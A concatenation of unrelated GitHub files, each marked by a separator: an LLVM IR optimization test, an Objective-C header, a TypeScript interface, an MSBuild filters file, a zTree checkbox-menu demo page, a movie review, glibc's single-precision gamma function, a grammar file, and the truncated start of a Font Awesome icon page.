; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[TMP0:%.*]] = sext i32 [[M]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[M]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP1:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD:%.*]] = add nsw i32 [[TMP1]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = add nsw i64 [[INDVARS_IV]], [[TMP0]]
; CHECK-NEXT: [[TMP4:%.*]] = trunc i64 [[TMP3]] to i32
; CHECK-NEXT: [[IDXPROM4:%.*]] = zext i32 [[TMP4]] to i64
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[IDXPROM4]]
; CHECK-NEXT: store i32 [[ADD]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: [[CALL:%.*]] = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
; CHECK-NEXT: ret i32 0
;
entry:
%cmp1 = icmp slt i32 0, %M
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = sext i32 %i.02 to i64
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%idxprom1 = sext i32 %i.02 to i64
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add = add nsw i32 %0, %1
%add3 = add nsw i32 %i.02, %M
%idxprom4 = zext i32 %add3 to i64
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 %idxprom4
store i32 %add, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %M
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
%call = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
ret i32 0
}
%struct.image = type {i32, i32}
define i32 @foo4(%struct.image* %input, i32 %length, i32* %in) {
; CHECK-LABEL: @foo4(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[STRIDE:%.*]] = getelementptr inbounds [[STRUCT_IMAGE:%.*]], %struct.image* [[INPUT:%.*]], i64 0, i32 1
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[STRIDE]], align 4
; CHECK-NEXT: [[CMP17:%.*]] = icmp sgt i32 [[LENGTH:%.*]], 1
; CHECK-NEXT: br i1 [[CMP17]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_COND_CLEANUP:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[CHANNEL:%.*]] = getelementptr inbounds [[STRUCT_IMAGE]], %struct.image* [[INPUT]], i64 0, i32 0
; CHECK-NEXT: [[TMP1:%.*]] = sext i32 [[TMP0]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[LENGTH]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.cond.cleanup.loopexit:
; CHECK-NEXT: [[TMP2:%.*]] = phi i32 [ [[TMP10:%.*]], [[FOR_BODY]] ]
; CHECK-NEXT: br label [[FOR_COND_CLEANUP]]
; CHECK: for.cond.cleanup:
; CHECK-NEXT: [[TMP3:%.*]] = phi i32 [ 0, [[ENTRY:%.*]] ], [ [[TMP2]], [[FOR_COND_CLEANUP_LOOPEXIT:%.*]] ]
; CHECK-NEXT: ret i32 [[TMP3]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_BODY]] ], [ 1, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[TMP4:%.*]] = load i32, i32* [[CHANNEL]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = sext i32 [[TMP4]] to i64
; CHECK-NEXT: [[TMP6:%.*]] = mul nsw i64 [[TMP5]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR:%.*]] = getelementptr inbounds i32, i32* [[IN:%.*]], i64 [[TMP6]]
; CHECK-NEXT: [[TMP7:%.*]] = load i32, i32* [[ADD_PTR]], align 4
; CHECK-NEXT: [[TMP8:%.*]] = mul nsw i64 [[TMP1]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR1:%.*]] = getelementptr inbounds i32, i32* [[IN]], i64 [[TMP8]]
; CHECK-NEXT: [[TMP9:%.*]] = load i32, i32* [[ADD_PTR1]], align 4
; CHECK-NEXT: [[TMP10]] = add i32 [[TMP7]], [[TMP9]]
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_CLEANUP_LOOPEXIT]]
;
entry:
%stride = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 1
%0 = load i32, i32* %stride, align 4
%cmp17 = icmp sgt i32 %length, 1
br i1 %cmp17, label %for.body.lr.ph, label %for.cond.cleanup
for.body.lr.ph: ; preds = %entry
%channel = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 0
br label %for.body
for.cond.cleanup.loopexit: ; preds = %for.body
%1 = phi i32 [ %6, %for.body ]
br label %for.cond.cleanup
for.cond.cleanup: ; preds = %for.cond.cleanup.loopexit, %entry
%2 = phi i32 [ 0, %entry ], [ %1, %for.cond.cleanup.loopexit ]
ret i32 %2
; mul instruction below is widened instead of generating a truncate instruction for it
; regardless if Load operand of mul is inside or outside the loop (we have both cases).
for.body: ; preds = %for.body.lr.ph, %for.body
%x.018 = phi i32 [ 1, %for.body.lr.ph ], [ %add, %for.body ]
%add = add nuw nsw i32 %x.018, 1
%3 = load i32, i32* %channel, align 8
%mul = mul nsw i32 %3, %add
%idx.ext = sext i32 %mul to i64
%add.ptr = getelementptr inbounds i32, i32* %in, i64 %idx.ext
%4 = load i32, i32* %add.ptr, align 4
%mul1 = mul nsw i32 %0, %add
%idx.ext1 = sext i32 %mul1 to i64
%add.ptr1 = getelementptr inbounds i32, i32* %in, i64 %idx.ext1
%5 = load i32, i32* %add.ptr1, align 4
%6 = add i32 %4, %5
%cmp = icmp slt i32 %add, %length
br i1 %cmp, label %for.body, label %for.cond.cleanup.loopexit
}
define i32 @foo5(%struct.image* %input, i32 %length, i32* %in) {
; CHECK-LABEL: @foo5(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[STRIDE:%.*]] = getelementptr inbounds [[STRUCT_IMAGE:%.*]], %struct.image* [[INPUT:%.*]], i64 0, i32 1
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[STRIDE]], align 4
; CHECK-NEXT: [[CMP17:%.*]] = icmp sgt i32 [[LENGTH:%.*]], 1
; CHECK-NEXT: br i1 [[CMP17]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_COND_CLEANUP:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[CHANNEL:%.*]] = getelementptr inbounds [[STRUCT_IMAGE]], %struct.image* [[INPUT]], i64 0, i32 0
; CHECK-NEXT: [[TMP1:%.*]] = sext i32 [[TMP0]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[LENGTH]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.cond.cleanup.loopexit:
; CHECK-NEXT: [[TMP2:%.*]] = phi i32 [ [[TMP10:%.*]], [[FOR_BODY]] ]
; CHECK-NEXT: br label [[FOR_COND_CLEANUP]]
; CHECK: for.cond.cleanup:
; CHECK-NEXT: [[TMP3:%.*]] = phi i32 [ 0, [[ENTRY:%.*]] ], [ [[TMP2]], [[FOR_COND_CLEANUP_LOOPEXIT:%.*]] ]
; CHECK-NEXT: ret i32 [[TMP3]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_BODY]] ], [ 1, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[TMP4:%.*]] = load i32, i32* [[CHANNEL]], align 8
; CHECK-NEXT: [[TMP5:%.*]] = trunc i64 [[INDVARS_IV_NEXT]] to i32
; CHECK-NEXT: [[MUL:%.*]] = mul nsw i32 [[TMP4]], [[TMP5]]
; CHECK-NEXT: [[IDX_EXT:%.*]] = sext i32 [[MUL]] to i64
; CHECK-NEXT: [[ADD_PTR:%.*]] = getelementptr inbounds i32, i32* [[IN:%.*]], i64 [[IDX_EXT]]
; CHECK-NEXT: [[TMP6:%.*]] = load i32, i32* [[ADD_PTR]], align 4
; CHECK-NEXT: [[TMP7:%.*]] = mul nsw i64 [[TMP1]], [[INDVARS_IV_NEXT]]
; CHECK-NEXT: [[ADD_PTR1:%.*]] = getelementptr inbounds i32, i32* [[IN]], i64 [[TMP7]]
; CHECK-NEXT: [[TMP8:%.*]] = load i32, i32* [[ADD_PTR1]], align 4
; CHECK-NEXT: [[TMP9:%.*]] = add i32 [[TMP6]], [[TMP8]]
; CHECK-NEXT: [[TMP10]] = add i32 [[TMP9]], [[MUL]]
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_CLEANUP_LOOPEXIT]]
;
entry:
%stride = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 1
%0 = load i32, i32* %stride, align 4
%cmp17 = icmp sgt i32 %length, 1
br i1 %cmp17, label %for.body.lr.ph, label %for.cond.cleanup
for.body.lr.ph: ; preds = %entry
%channel = getelementptr inbounds %struct.image, %struct.image* %input, i64 0, i32 0
br label %for.body
for.cond.cleanup.loopexit: ; preds = %for.body
%1 = phi i32 [ %7, %for.body ]
br label %for.cond.cleanup
for.cond.cleanup: ; preds = %for.cond.cleanup.loopexit, %entry
%2 = phi i32 [ 0, %entry ], [ %1, %for.cond.cleanup.loopexit ]
ret i32 %2
; This example is the same as above except that the first mul is used in two places
; and this may result in having two versions of the multiply: an i32 and i64 version.
; In this case, keep the trucate instructions to avoid this redundancy.
for.body: ; preds = %for.body.lr.ph, %for.body
%x.018 = phi i32 [ 1, %for.body.lr.ph ], [ %add, %for.body ]
%add = add nuw nsw i32 %x.018, 1
%3 = load i32, i32* %channel, align 8
%mul = mul nsw i32 %3, %add
%idx.ext = sext i32 %mul to i64
%add.ptr = getelementptr inbounds i32, i32* %in, i64 %idx.ext
%4 = load i32, i32* %add.ptr, align 4
%mul1 = mul nsw i32 %0, %add
%idx.ext1 = sext i32 %mul1 to i64
%add.ptr1 = getelementptr inbounds i32, i32* %in, i64 %idx.ext1
%5 = load i32, i32* %add.ptr1, align 4
%6 = add i32 %4, %5
%7 = add i32 %6, %mul
%cmp = icmp slt i32 %add, %length
br i1 %cmp, label %for.body, label %for.cond.cleanup.loopexit
}
| {
"pile_set_name": "Github"
} |
//
// MediaCaptureTestAppViewController.h
// MediaCaptureTestApp
//
// Created by Prasad Malekudiyi Balakrishn on 2/9/12.
// Copyright __MyCompanyName__ 2012. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface MediaCaptureTestAppViewController : UIViewController {
}
@end
| {
"pile_set_name": "Github"
} |
export interface IKeyPair {
account: string;
region: string;
keyName: string;
keyFingerprint: string;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Sources">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Headers">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\..\gettext-tools\src\msgcomm.c"><Filter>Sources</Filter></ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\..\windows\gettext.rc"><Filter>Resource Files</Filter></ResourceCompile>
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<HTML>
<HEAD>
<TITLE>ZTREE DEMO - checkbox select menu</TITLE>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="../../../css/demo.css" type="text/css">
<link rel="stylesheet" href="../../../css/zTreeStyle/zTreeStyle.css"
type="text/css">
<script type="text/javascript" src="../../../js/jquery-1.4.4.min.js"></script>
<script type="text/javascript"
src="../../../js/jquery.ztree.core-3.5.js"></script>
<script type="text/javascript"
src="../../../js/jquery.ztree.excheck-3.5.js"></script>
<!-- <script type="text/javascript" src="../../../js/jquery.ztree.exedit-3.5.js"></script>-->
<SCRIPT type="text/javascript">
<!--
var setting = {
check: {
enable: true,
chkboxType: {"Y":"", "N":""}
},
view: {
dblClickExpand: false
},
data: {
simpleData: {
enable: true
}
},
callback: {
beforeClick: beforeClick,
onCheck: onCheck
}
};
var zNodes =[
{id:1, pId:0, name:"北京"},
{id:2, pId:0, name:"天津"},
{id:3, pId:0, name:"上海"},
{id:6, pId:0, name:"重庆"},
{id:4, pId:0, name:"河北省", open:true, nocheck:true},
{id:41, pId:4, name:"石家庄"},
{id:42, pId:4, name:"保定"},
{id:43, pId:4, name:"邯郸"},
{id:44, pId:4, name:"承德"},
{id:5, pId:0, name:"广东省", open:true, nocheck:true},
{id:51, pId:5, name:"广州"},
{id:52, pId:5, name:"深圳"},
{id:53, pId:5, name:"东莞"},
{id:54, pId:5, name:"佛山"},
{id:6, pId:0, name:"福建省", open:true, nocheck:true},
{id:61, pId:6, name:"福州"},
{id:62, pId:6, name:"厦门"},
{id:63, pId:6, name:"泉州"},
{id:64, pId:6, name:"三明"}
];
function beforeClick(treeId, treeNode) {
var zTree = $.fn.zTree.getZTreeObj("treeDemo");
zTree.checkNode(treeNode, !treeNode.checked, null, true);
return false;
}
function onCheck(e, treeId, treeNode) {
var zTree = $.fn.zTree.getZTreeObj("treeDemo"),
nodes = zTree.getCheckedNodes(true),
v = "";
for (var i=0, l=nodes.length; i<l; i++) {
v += nodes[i].name + ",";
}
if (v.length > 0 ) v = v.substring(0, v.length-1);
var cityObj = $("#citySel");
cityObj.attr("value", v);
}
function showMenu() {
var cityObj = $("#citySel");
var cityOffset = $("#citySel").offset();
$("#menuContent").css({left:cityOffset.left + "px", top:cityOffset.top + cityObj.outerHeight() + "px"}).slideDown("fast");
$("body").bind("mousedown", onBodyDown);
}
function hideMenu() {
$("#menuContent").fadeOut("fast");
$("body").unbind("mousedown", onBodyDown);
}
function onBodyDown(event) {
if (!(event.target.id == "menuBtn" || event.target.id == "citySel" || event.target.id == "menuContent" || $(event.target).parents("#menuContent").length>0)) {
hideMenu();
}
}
$(document).ready(function(){
$.fn.zTree.init($("#treeDemo"), setting, zNodes);
});
//-->
</SCRIPT>
<style type="text/css">
</style>
</HEAD>
<BODY>
<h1>带 checkbox 的多选下拉菜单 -- zTree</h1>
<h6>[ 文件路径: super/select_menu_checkbox.html ]</h6>
<div class="content_wrap">
<div class="zTreeDemoBackground left">
<ul class="list">
<li class="title"> <span class="highlight_red">勾选
checkbox 或者 点击节点 进行选择</span></li>
<li class="title"> Test: <input id="citySel"
type="text" readonly value="" style="width: 120px;"
onclick="showMenu();" /> <a id="menuBtn" href="#"
onclick="showMenu(); return false;">select</a></li>
</ul>
</div>
<div class="right">
<ul class="info">
<li class="title"><h2>实现方法说明</h2>
<ul class="list">
<li>用 checkbox 也可以轻松实现多选的下拉菜单</li>
<li>此 Demo 主要用于 和 其他下拉菜单进行对比</li>
</ul></li>
</ul>
</div>
</div>
<div id="menuContent" class="menuContent"
style="display: none; position: absolute;">
<ul id="treeDemo" class="ztree"
style="margin-top: 0; width: 180px; height: 300px;"></ul>
</div>
</BODY>
</HTML> | {
"pile_set_name": "Github"
} |
47 01 60 00 bd 03 27 21 24 00 0a 00 00 00 00 00
47 00 60 00 bd 03 60 20 40 00 00 00 00 00 00 00
47 00 80 00 bd 03 60 20 40 00 00 00 00 00 00 00
| {
"pile_set_name": "Github"
} |
for many people , procrastination isn't a problem to overcome , it's a high art .
we'll do just about anything to put off a task .
when the deadline for this column nears , it's the only time during the week dishes get washed and the bed made and laundry done and plants watered and . . .
eventually , hopefully , sometimes , there's a breakthrough and we actually get down to work .
amazingly it's almost always easier than we dreaded and after finishing , that sense of oppressive apprehension melts away .
and then , the next time , we do it all again .
english professor grady tripp ( michael douglas ) is a master .
seven years ago , his first book was a hit .
he's been working on his second -- a short 200-page piece -- since then .
fearful that he can't live up to the first , he can't bring himself to finish it .
no writer's block , he's nearing 3 , 000 pages with no end in sight .
now he's having a particularly difficult day .
the college's annual writers conference is bringing in accomplished novelists reminding tripp that other people are finishing _their_ books .
during the first day , his wife has left him , his married girlfriend informs him she's pregnant and his agent is in town with a six-foot transvestite in tow .
by the evening , our besieged writer is driving though the snow-covered streets of pittsburgh with a suicidal student beside him , a stolen jacket that marilyn monroe wore on her wedding day in the back seat and a murdered blind dog stuffed in the trunk .
this could be a pivotal point in his mid-life crisis .
and then there's the next morning .
there's a lot to like about this movie .
there are no huge explosions , shattering glass or computer-generated dinosaurs to distract from the very real human issues .
grady is caught up in the curse of people who accomplish great things early in their career .
in the world of " what have you done for me lately ? " , he knows his second book has to be better than his first .
instead of finding out , he drifts , comfortable in the insular cocoon of academic peter panhood .
he doesn't have much of a life and neither does his star pupil james leer ( tobey maguire ) .
james may be suicidal and psychotic .
certainly everything that comes out of his mouth is a lie .
he makes up a past of working clash anguish because the truth of wealth and comfort just isn't interesting enough .
as the weekend progresses , they are both forced to fully engage life .
that's the question they must face : comfort or real experiences ?
the film takes some interesting chances .
non-traditional relationships are presented as matter-of-fact .
extra-marital , gay , interracial , professor-student : here they aren't judged , merely choices .
the actors are all first-rate .
douglas triumphs , playing against type as he spends most of his time disheveled , unshaven and clad in a pink women's house robe .
maguire's disengaged alienation works perfectly here .
robert downey jr . as grady's agent livens up his scenes .
director curtis hanson ( " l . a .
confidential " ) makes a few missteps .
the women are underused .
frances mcdormand does a good job of her limited role of sara , grady's married lover but we never understand much of who she is .
the chemistry between the two of them is non-existent which makes some of the ending unconvincing .
katie holmes is a student with a major crush on the professor , but her character goes nowhere .
we never even see grady's exiting wife .
this is very much a guy's film .
the varied relationships between the men are much more convincing than any of the others .
grady's alternating mentoring and rejection of james is the centerpoint of the film , not him and sara .
as the boomers age , expect to see more mid-life crisis films to catch the attention of that demographic .
eventually it'll probably become cliche , but right now we've got a winner .
i'll finish this in a second .
right now i have to grab some paint .
i noticed some trim in the other room that needs a little touch-up .
( michael redman has written this column for so long that he's made mid-life crisis a career choice . )
| {
"pile_set_name": "Github"
} |
{
"description": "Demo of Google GeoChart",
"main": "index.js",
"dependencies": {
"react": "^16",
"react-dom": "^16",
"react-google-charts": ">2.0.0"
}
}
| {
"pile_set_name": "Github"
} |
/* Implementation of gamma function according to ISO C.
Copyright (C) 1997-2018 Free Software Foundation, Inc.
This file is part of the GNU C Library.
Contributed by Ulrich Drepper <[email protected]>, 1997.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
#include <math.h>
#include <math-narrow-eval.h>
#include <math_private.h>
#include <math-underflow.h>
#include <float.h>
/* Coefficients B_2k / 2k(2k-1) of x^-(2k-1) inside exp in Stirling's
approximation to gamma function. */
static const float gamma_coeff[] =
{
0x1.555556p-4f,
-0xb.60b61p-12f,
0x3.403404p-12f,
};
#define NCOEFF (sizeof (gamma_coeff) / sizeof (gamma_coeff[0]))
/* Return gamma (X), for positive X less than 42, in the form R *
2^(*EXP2_ADJ), where R is the return value and *EXP2_ADJ is set to
avoid overflow or underflow in intermediate calculations. */
static float
gammaf_positive (float x, int *exp2_adj)
{
int local_signgam;
if (x < 0.5f)
{
*exp2_adj = 0;
return __ieee754_expf (__ieee754_lgammaf_r (x + 1, &local_signgam)) / x;
}
else if (x <= 1.5f)
{
*exp2_adj = 0;
return __ieee754_expf (__ieee754_lgammaf_r (x, &local_signgam));
}
else if (x < 2.5f)
{
*exp2_adj = 0;
float x_adj = x - 1;
return (__ieee754_expf (__ieee754_lgammaf_r (x_adj, &local_signgam))
* x_adj);
}
else
{
float eps = 0;
float x_eps = 0;
float x_adj = x;
float prod = 1;
if (x < 4.0f)
{
/* Adjust into the range for applying Stirling's
approximation. */
float n = __ceilf (4.0f - x);
x_adj = math_narrow_eval (x + n);
x_eps = (x - (x_adj - n));
prod = __gamma_productf (x_adj - n, x_eps, n, &eps);
}
/* The result is now gamma (X_ADJ + X_EPS) / (PROD * (1 + EPS)).
Compute gamma (X_ADJ + X_EPS) using Stirling's approximation,
starting by computing pow (X_ADJ, X_ADJ) with a power of 2
factored out. */
float exp_adj = -eps;
float x_adj_int = __roundf (x_adj);
float x_adj_frac = x_adj - x_adj_int;
int x_adj_log2;
float x_adj_mant = __frexpf (x_adj, &x_adj_log2);
if (x_adj_mant < (float) M_SQRT1_2)
{
x_adj_log2--;
x_adj_mant *= 2.0f;
}
*exp2_adj = x_adj_log2 * (int) x_adj_int;
float ret = (__ieee754_powf (x_adj_mant, x_adj)
* __ieee754_exp2f (x_adj_log2 * x_adj_frac)
* __ieee754_expf (-x_adj)
* sqrtf (2 * (float) M_PI / x_adj)
/ prod);
exp_adj += x_eps * __ieee754_logf (x_adj);
float bsum = gamma_coeff[NCOEFF - 1];
float x_adj2 = x_adj * x_adj;
for (size_t i = 1; i <= NCOEFF - 1; i++)
bsum = bsum / x_adj2 + gamma_coeff[NCOEFF - 1 - i];
exp_adj += bsum / x_adj;
return ret + ret * __expm1f (exp_adj);
}
}
float
__ieee754_gammaf_r (float x, int *signgamp)
{
int32_t hx;
float ret;
GET_FLOAT_WORD (hx, x);
if (__glibc_unlikely ((hx & 0x7fffffff) == 0))
{
/* Return value for x == 0 is Inf with divide by zero exception. */
*signgamp = 0;
return 1.0 / x;
}
if (__builtin_expect (hx < 0, 0)
&& (uint32_t) hx < 0xff800000 && __rintf (x) == x)
{
/* Return value for integer x < 0 is NaN with invalid exception. */
*signgamp = 0;
return (x - x) / (x - x);
}
if (__glibc_unlikely (hx == 0xff800000))
{
/* x == -Inf. According to ISO this is NaN. */
*signgamp = 0;
return x - x;
}
if (__glibc_unlikely ((hx & 0x7f800000) == 0x7f800000))
{
/* Positive infinity (return positive infinity) or NaN (return
NaN). */
*signgamp = 0;
return x + x;
}
if (x >= 36.0f)
{
/* Overflow. */
*signgamp = 0;
ret = math_narrow_eval (FLT_MAX * FLT_MAX);
return ret;
}
else
{
SET_RESTORE_ROUNDF (FE_TONEAREST);
if (x > 0.0f)
{
*signgamp = 0;
int exp2_adj;
float tret = gammaf_positive (x, &exp2_adj);
ret = __scalbnf (tret, exp2_adj);
}
else if (x >= -FLT_EPSILON / 4.0f)
{
*signgamp = 0;
ret = 1.0f / x;
}
else
{
float tx = __truncf (x);
*signgamp = (tx == 2.0f * __truncf (tx / 2.0f)) ? -1 : 1;
if (x <= -42.0f)
/* Underflow. */
ret = FLT_MIN * FLT_MIN;
else
{
float frac = tx - x;
if (frac > 0.5f)
frac = 1.0f - frac;
float sinpix = (frac <= 0.25f
? __sinf ((float) M_PI * frac)
: __cosf ((float) M_PI * (0.5f - frac)));
int exp2_adj;
float tret = (float) M_PI / (-x * sinpix
* gammaf_positive (-x, &exp2_adj));
ret = __scalbnf (tret, -exp2_adj);
math_check_force_underflow_nonneg (ret);
}
}
ret = math_narrow_eval (ret);
}
if (isinf (ret) && x != 0)
{
if (*signgamp < 0)
{
ret = math_narrow_eval (-__copysignf (FLT_MAX, ret) * FLT_MAX);
ret = -ret;
}
else
ret = math_narrow_eval (__copysignf (FLT_MAX, ret) * FLT_MAX);
return ret;
}
else if (ret == 0)
{
if (*signgamp < 0)
{
ret = math_narrow_eval (-__copysignf (FLT_MIN, ret) * FLT_MIN);
ret = -ret;
}
else
ret = math_narrow_eval (__copysignf (FLT_MIN, ret) * FLT_MIN);
return ret;
}
else
return ret;
}
strong_alias (__ieee754_gammaf_r, __gammaf_r_finite)
| {
"pile_set_name": "Github"
} |
S : ;
: "a" ;
: "a" "a" ;
: "a" A "b" ;
: "b" A "a" ;
A : "a" A "a" ;
: "b" A "b" ;
: "a" A "b" ;
: "b" A "a" ;
: ;
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!-->
<html lang="en" xmlns="http://www.w3.org/1999/html"> <!--<![endif]-->
<head>
<!-- Basic Page Needs
================================================== -->
<meta charset="utf-8" />
<title>icon-minus-sign-alt: Font Awesome Icons</title>
<meta name="description" content="Font Awesome, the iconic font designed for Bootstrap">
<meta name="author" content="Dave Gandy">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!--<meta name="viewport" content="initial-scale=1; maximum-scale=1">-->
<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<!-- CSS
================================================== -->
<link rel="stylesheet" href="../../assets/css/site.css">
<link rel="stylesheet" href="../../assets/css/pygments.css">
<link rel="stylesheet" href="../../assets/font-awesome/css/font-awesome.css">
<!--[if IE 7]>
<link rel="stylesheet" href="../../assets/font-awesome/css/font-awesome-ie7.css">
<![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="../../assets/ico/favicon.ico">
<script type="text/javascript" src="//use.typekit.net/wnc7ioh.js"></script>
<script type="text/javascript">try{Typekit.load();}catch(e){}</script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-30136587-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head>
<body data-spy="scroll" data-target=".navbar">
<div class="wrapper"> <!-- necessary for sticky footer. wrap all content except footer -->
<div class="navbar navbar-inverse navbar-static-top hidden-print">
<div class="navbar-inner">
<div class="container">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
